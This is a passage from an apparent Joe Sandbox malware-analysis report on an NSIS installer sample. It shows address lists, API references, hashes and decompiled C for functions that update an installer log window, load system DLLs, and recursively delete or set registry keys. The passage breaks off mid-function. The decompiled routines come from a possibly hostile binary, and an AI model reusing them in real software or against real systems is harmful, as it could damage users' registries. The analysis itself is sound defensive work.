                                                            0x00401836
                                                            0x0040184c
                                                            0x0040184c
                                                            0x0040184f
                                                            0x00000000
                                                            0x00401855
                                                            0x00401855
                                                            0x00401856
                                                            0x00401873
                                                            0x00402ace
                                                            0x00402ace
                                                            0x00402ace
                                                            0x00401858
                                                            0x00401858
                                                            0x00401859
                                                            0x00401492
                                                            0x0040238f
                                                            0x0040238f
                                                            0x0040238f
                                                            0x00401856
                                                            0x0040184f
                                                            0x00402ad0
                                                            0x00402ad4
                                                            0x00402ad4
                                                            0x00401883
                                                            0x00401888
                                                            0x00401896
                                                            0x0040189b
                                                            0x004018a1
                                                            0x004018a5
                                                            0x004018a7
                                                            0x004018af
                                                            0x004018bb
                                                            0x004018a9
                                                            0x004018a9
                                                            0x004018ad
                                                            0x00000000
                                                            0x00000000
                                                            0x004018ad
                                                            0x004018c4
                                                            0x004018ca
                                                            0x004018cc
                                                            0x00000000
                                                            0x004018d2
                                                            0x004018d2
                                                            0x004018d5
                                                            0x004018ed
                                                            0x004018d7
                                                            0x004018da
                                                            0x004018e3
                                                            0x004018e3
                                                            0x004018f2
                                                            0x004018f7
                                                            0x0040238a
                                                            0x00000000
                                                            0x0040238a
                                                            0x00000000

                                                            APIs
                                                            • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\Raped\Forbundskansleres.nav,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00000000,00000000,00000031), ref: 00401798
                                                            • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\Raped\Forbundskansleres.nav,C:\Users\user\Raped\Forbundskansleres.nav,00000000,00000000,C:\Users\user\Raped\Forbundskansleres.nav,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00000000,00000000,00000031), ref: 004017C2
                                                              • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000B,0000000B,00002000,00403556,0044E420,NSIS Error,?,00000007,00000009,0000000B), ref: 00406264
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(Copy failed,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Copy failed,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                              • Part of subcall function 00405378: lstrcatA.KERNEL32(Copy failed,0040329E,0040329E,Copy failed,00000000,0042CE48,7555110C), ref: 004053D4
                                                              • Part of subcall function 00405378: SetWindowTextA.USER32(Copy failed,Copy failed), ref: 004053E6
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 0040540C
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405426
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405434
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                            • String ID: 8@$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$C:\Users\user\Pictures\Ray\Sorghos.Rei$C:\Users\user\Raped\Forbundskansleres.nav
                                                            • API String ID: 1941528284-2731853383
                                                            • Opcode ID: 17a4ae110c0ca27f03c3979ff1c6c9ce433cce4c94a9e24745227020a4c7ece8
                                                            • Instruction ID: 3e968e9bdc471329156ed959ca9c7b0cca39a402a35bfbb3b78bbd1fa7da6ddf
                                                            • Opcode Fuzzy Hash: 17a4ae110c0ca27f03c3979ff1c6c9ce433cce4c94a9e24745227020a4c7ece8
                                                            • Instruction Fuzzy Hash: F341D471900215BBCB207BB5CD45DAF7679EF45369B20823FF422B20E2D77C8A518A6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405378 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 926 405378-40538d 927 405443-405447 926->927 928 405393-4053a5 926->928 929 4053b0-4053bc lstrlenA 928->929 930 4053a7-4053ab call 4062ea 928->930 932 4053d9-4053dd 929->932 933 4053be-4053ce lstrlenA 929->933 930->929 935 4053ec-4053f0 932->935 936 4053df-4053e6 SetWindowTextA 932->936 933->927 934 4053d0-4053d4 lstrcatA 933->934 934->932 937 4053f2-405434 SendMessageA * 3 935->937 938 405436-405438 935->938 936->935 937->938 938->927 939 40543a-40543d 938->939 939->927
                                                            C-Code - Quality: 100%
                                                            			E00405378(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x44e404;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4524d4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062EA(0, _t39, 0x438070, 0x438070, _a4);
					}
					_t26 = lstrlenA(0x438070);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x44e3e8, 0x438070); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x438070;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x438070)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x4000) {
							_t26 = lstrcatA(0x438070, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                            0x0040537e
                                                            0x0040538a
                                                            0x0040538d
                                                            0x00405393
                                                            0x0040539f
                                                            0x004053a2
                                                            0x004053a5
                                                            0x004053ab
                                                            0x004053ab
                                                            0x004053b1
                                                            0x004053b9
                                                            0x004053bc
                                                            0x004053d9
                                                            0x004053dd
                                                            0x004053e6
                                                            0x004053e6
                                                            0x004053f0
                                                            0x004053f9
                                                            0x00405405
                                                            0x0040540c
                                                            0x00405410
                                                            0x00405413
                                                            0x00405426
                                                            0x00405434
                                                            0x00405434
                                                            0x00405438
                                                            0x0040543a
                                                            0x0040543d
                                                            0x00000000
                                                            0x0040543d
                                                            0x004053be
                                                            0x004053c6
                                                            0x004053ce
                                                            0x004053d4
                                                            0x00000000
                                                            0x004053d4
                                                            0x004053ce
                                                            0x004053bc
                                                            0x00405447

                                                            APIs
                                                            • lstrlenA.KERNEL32(Copy failed,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                            • lstrlenA.KERNEL32(0040329E,Copy failed,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                            • lstrcatA.KERNEL32(Copy failed,0040329E,0040329E,Copy failed,00000000,0042CE48,7555110C), ref: 004053D4
                                                            • SetWindowTextA.USER32(Copy failed,Copy failed), ref: 004053E6
                                                            • SendMessageA.USER32 ref: 0040540C
                                                            • SendMessageA.USER32 ref: 00405426
                                                            • SendMessageA.USER32 ref: 00405434
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                            • String ID: Copy failed
                                                            • API String ID: 2531174081-2810831833
                                                            • Opcode ID: 43b59e8548ca3e8478251fdd04fd0e5e98560b6af6290137ab004f16df5a9164
                                                            • Instruction ID: 37f28695abd5d6743d555213097846b75af7b366b005b624e269435409e9a681
                                                            • Opcode Fuzzy Hash: 43b59e8548ca3e8478251fdd04fd0e5e98560b6af6290137ab004f16df5a9164
                                                            • Instruction Fuzzy Hash: 78218C71D00208BBDB11AFA5DD84ADEBFB9EF05354F14807AF904B6291C7798E808F98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004065F5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 940 4065f5-406615 GetSystemDirectoryA 941 406617 940->941 942 406619-40661b 940->942 941->942 943 40662b-40662d 942->943 944 40661d-406625 942->944 946 40662e-406660 wsprintfA LoadLibraryExA 943->946 944->943 945 406627-406629 944->945 945->946
                                                            C-Code - Quality: 100%
                                                            			E004065F5(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                            0x0040660c
                                                            0x00406615
                                                            0x00406617
                                                            0x00406617
                                                            0x0040661b
                                                            0x0040662d
                                                            0x00406627
                                                            0x00406627
                                                            0x00406627
                                                            0x00406631
                                                            0x00406645
                                                            0x00406659
                                                            0x00406660

                                                            APIs
                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040660C
                                                            • wsprintfA.USER32 ref: 00406645
                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406659
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                            • String ID: %s%s.dll$UXTHEME$\
                                                            • API String ID: 2200240437-4240819195
                                                            • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                            • Instruction ID: 9f789840e0b15416ae64874b5c60068ae2f650887ed5db1015d4ebb1f4ad26b2
                                                            • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                            • Instruction Fuzzy Hash: 12F0213051060A67DB14A764DD0DFFB3B5CEB08304F14047EA586F10C1DAB9D5358B5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402D3B Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 947 402d3b-402d64 call 4060dd 949 402d69-402d6d 947->949 950 402d73-402d77 949->950 951 402e1e-402e22 949->951 952 402d79-402d9a RegEnumValueA 950->952 953 402d9c-402daf 950->953 952->953 955 402e03-402e11 RegCloseKey 952->955 954 402dd8-402ddf RegEnumKeyA 953->954 956 402db1-402db3 954->956 957 402de1-402df3 RegCloseKey call 406663 954->957 955->951 956->955 958 402db5-402dc9 call 402d3b 956->958 963 402e13-402e19 957->963 964 402df5-402e01 RegDeleteKeyA 957->964 958->957 965 402dcb-402dd7 958->965 963->951 964->951 965->954
                                                            C-Code - Quality: 48%
                                                            			E00402D3B(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060DD(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402D3B(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406663(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                            0x00402d46
                                                            0x00402d4f
                                                            0x00402d58
                                                            0x00402d64
                                                            0x00402d6d
                                                            0x00402d77
                                                            0x00402d9c
                                                            0x00402da2
                                                            0x00402da7
                                                            0x00402da8
                                                            0x00402dd8
                                                            0x00402db1
                                                            0x00402db3
                                                            0x00402e03
                                                            0x00402e06
                                                            0x00000000
                                                            0x00402e0c
                                                            0x00402dc2
                                                            0x00402dc7
                                                            0x00402dc9
                                                            0x00000000
                                                            0x00000000
                                                            0x00402dd1
                                                            0x00402dd6
                                                            0x00402dd7
                                                            0x00402dd7
                                                            0x00402de4
                                                            0x00402dec
                                                            0x00402df3
                                                            0x00000000
                                                            0x00402e1c
                                                            0x00000000
                                                            0x00402dfb
                                                            0x00402d87
                                                            0x00402d9a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00402d9a
                                                            0x00402e22

                                                            APIs
                                                            • RegEnumValueA.ADVAPI32 ref: 00402D8F
                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402DDB
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402DE4
                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402DFB
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402E06
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseEnum$DeleteValue
                                                            • String ID:
                                                            • API String ID: 1354259210-0
                                                            • Opcode ID: 0b70125d2885548f0ad194bbca3c62b33980be104f870c091c4e8a98a002eebf
                                                            • Instruction ID: d48e4a71bfa48a15fd7248f9ae3dc224302ba9e6f67c9eaa91d5645e55e2e307
                                                            • Opcode Fuzzy Hash: 0b70125d2885548f0ad194bbca3c62b33980be104f870c091c4e8a98a002eebf
                                                            • Instruction Fuzzy Hash: D9213771500108BADF129F90CE89EEB7B7DEF44344F10047AFA15B11A0D7B49EA4AAA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040247E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 966 40247e-4024af call 402c39 * 2 call 402cc9 973 402ac5-402ad4 966->973 974 4024b5-4024bf 966->974 975 4024c1-4024ce call 402c39 lstrlenA 974->975 976 4024cf-4024d2 974->976 975->976 979 4024d4-4024e8 call 402c17 976->979 980 4024e9-4024ec 976->980 979->980 984 4024fd-402511 RegSetValueExA 980->984 985 4024ee-4024f8 call 403143 980->985 988 402513 984->988 989 402516-4025f3 RegCloseKey 984->989 985->984 988->989 989->973
                                                            C-Code - Quality: 83%
                                                            			E0040247E(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t18;
				void* _t19;
				int _t22;
				long _t23;
				int _t28;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t35;
				void* _t37;
				void* _t40;

				_t31 = __edx;
				_t28 = __ebx;
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				_t32 = __eax;
				 *(_t37 - 0x38) =  *(_t37 - 0x14);
				 *(_t37 - 0x78) = E00402C39(2);
				_t18 = E00402C39(0x11);
				 *(_t37 - 4) = 1;
				_t19 = E00402CC9(_t40, _t32, _t18, 2); // executed
				 *(_t37 + 8) = _t19;
				if(_t19 != __ebx) {
					_t22 = 0;
					if(_t35 == 1) {
						E00402C39(0x23);
						_t22 = lstrlenA(0x40e438) + 1;
					}
					if(_t35 == 4) {
						 *0x40e438 = E00402C17(3);
						 *((intOrPtr*)(_t37 - 0x88)) = _t31;
						_t22 = _t35;
					}
					if(_t35 == 3) {
						_t22 = E00403143( *((intOrPtr*)(_t37 - 0x1c)), _t28, 0x40e438, 0x6000);
					}
					_t23 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x78), _t28,  *(_t37 - 0x38), 0x40e438, _t22); // executed
					if(_t23 == 0) {
						 *(_t37 - 4) = _t28;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x4524a8 =  *0x4524a8 +  *(_t37 - 4);
				return 0;
			}













                                                            0x0040247e
                                                            0x0040247e
                                                            0x0040247e
                                                            0x00402481
                                                            0x00402488
                                                            0x00402492
                                                            0x00402495
                                                            0x0040249e
                                                            0x004024a5
                                                            0x004024ac
                                                            0x004024af
                                                            0x004024b5
                                                            0x004024bf
                                                            0x004024c3
                                                            0x004024ce
                                                            0x004024ce
                                                            0x004024d2
                                                            0x004024dc
                                                            0x004024e2
                                                            0x004024e8
                                                            0x004024e8
                                                            0x004024ec
                                                            0x004024f8
                                                            0x004024f8
                                                            0x00402509
                                                            0x00402511
                                                            0x00402513
                                                            0x00402513
                                                            0x00402516
                                                            0x004025ed
                                                            0x004025ed
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • lstrlenA.KERNEL32(0040E438,00000023,00000011,00000002), ref: 004024C9
                                                            • RegSetValueExA.KERNEL32(?,?,?,?,0040E438,00000000), ref: 00402509
                                                            • RegCloseKey.ADVAPI32(?), ref: 004025ED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseValuelstrlen
                                                            • String ID: 8@
                                                            • API String ID: 2655323295-819625340
                                                            • Opcode ID: 65587d1442390afad9897b2e89eb803fe651756d21c2971c27c9d1827eb7d305
                                                            • Instruction ID: 5c472bfcd106fad06d1ca2f2b491726f83d19557c2f496224d1fecae1d857e91
                                                            • Opcode Fuzzy Hash: 65587d1442390afad9897b2e89eb803fe651756d21c2971c27c9d1827eb7d305
                                                            • Instruction Fuzzy Hash: C3115E71E04208BEEB10AFA5DE49AAEBA74AB44714F20443BF505B71C1D6B98D909B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004020A5 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 991 4020a5-4020b1 992 4020b7-4020cd call 402c39 * 2 991->992 993 40216c-40216e 991->993 1002 4020dc-4020ea LoadLibraryExA 992->1002 1003 4020cf-4020da GetModuleHandleA 992->1003 995 4022e5-4022ea call 401423 993->995 1001 402ac5-402ad4 995->1001 1005 4020ec-4020f9 GetProcAddress 1002->1005 1006 402165-402167 1002->1006 1003->1002 1003->1005 1008 402138-40213d call 405378 1005->1008 1009 4020fb-402101 1005->1009 1006->995 1013 402142-402145 1008->1013 1011 402103-40210f call 401423 1009->1011 1012 40211a-402136 1009->1012 1011->1013 1022 402111-402118 1011->1022 1012->1013 1013->1001 1016 40214b-402153 call 4039dd 1013->1016 1016->1001 1021 402159-402160 FreeLibrary 1016->1021 1021->1001 1022->1013
                                                            C-Code - Quality: 60%
                                                            			E004020A5(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x4524e0");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
